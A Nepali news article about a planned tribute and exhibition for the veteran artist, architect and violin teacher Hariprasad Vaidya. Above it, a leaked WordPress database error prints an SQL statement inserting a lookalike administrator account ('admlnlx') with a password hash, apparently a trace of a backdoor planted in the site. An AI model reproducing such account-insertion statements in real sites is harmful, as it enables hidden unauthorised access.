WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BC1EPKDG1zOCdnaJOSkhmKa/VoJa9z0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-02 10:50:07', '', 'admlnlx', 'admlnlx')
काठमाण्डौ । कला सिर्जना र सम्पदा संरक्षणमा अनवरत योगदान गर्दै आएका वरिष्ठ कलाकार हरिप्रसाद वैद्यलाई नेवाः ग्वहालि पुचः नेपाः, वडा नं १३ र १५ ले आउँदो वैशाख १० गते शनिबार अभिनन्दन गर्ने भएको छ ।
पुरातात्विक सम्पदाका वास्तुकला ज्ञाता, डिजाइनर, चित्रकार, सङ्गीतज्ञ तथा भ्वायलिन गुरु ८५ वर्षीय वैद्यका जीवनभरका उपलब्धिहरुलाई पनि आयोजक संस्थाले नेपाल कला परिषद्, बबरमहलमा तीन दिनसम्म प्रदर्शनीमा राख्ने भएको छ ।
विसं १९९३ मा काठमाडौँको टेंगल टोलमा जन्मनुभएका वैद्यले प्रख्यात चित्रकार चन्द्रमान मास्केबाट चित्रकला र पियानो बादक कृष्णलाल तण्डुकारबाट सङ्गीतका आधारभूत ज्ञान हासिल गरेको थियो । तत्पश्चात् उहाँले नेपालको परम्परागत सङ्गीत, वास्तुकला र आधुनिक चित्रकलाको ज्ञान आफ्नै प्रयत्नबाट सिक्नुभयो र पूरै जीवन यिनै क्षेत्रमा समर्पण गर्दै आए।
इन्द्रचोकको आकाश भैरवको देवघर, महाबौद्धको क्वापाः छेँ, मखनको वडा भवन, नारायण मन्दिर, गणेश मन्दिर र बाङ्गेमुढाको नृत्येश्वर मन्दिरको निर्माण कार्यमा उहाँको उल्लेखनीय योगदान रह्यो ।
काठमाडौँ महानगरपालिकाको लोगो, नेपाली सेना र नेपाल प्रहरीको चिन्ह तथा लोगो, तत्कालीन राष्ट्रिय पञ्चायत सदस्यहरुका लागि लोगो, नेपाल भाषा मंकाः खलः तथा नेपाल भाषा एकेडेमीका लोगो तयार पार्नुभएका उहाँले अद्यापि नयाँ पुस्ताका कलाकारहरुलाई भ्वायलिन सिकाउँदै आइरहेको आयोजक संस्थाका संयोजक विष्णु चित्रकारले सोमबार यहाँ आयोजित पत्रकार सम्मेलनमा जानकारी दिए ।
अष्टेलियामा नेपालको सङ्गीत प्रवद्र्धन गर्ने कार्यमा उहाँको योगदान सराहनीय छ । नेपाली परिवेश झल्कने दृश्यचित्र र व्यक्तिचित्र कोर्न रुचाउने उहाँ एक सिद्धहस्त चित्रकार मानिनु हुन्छ । रासस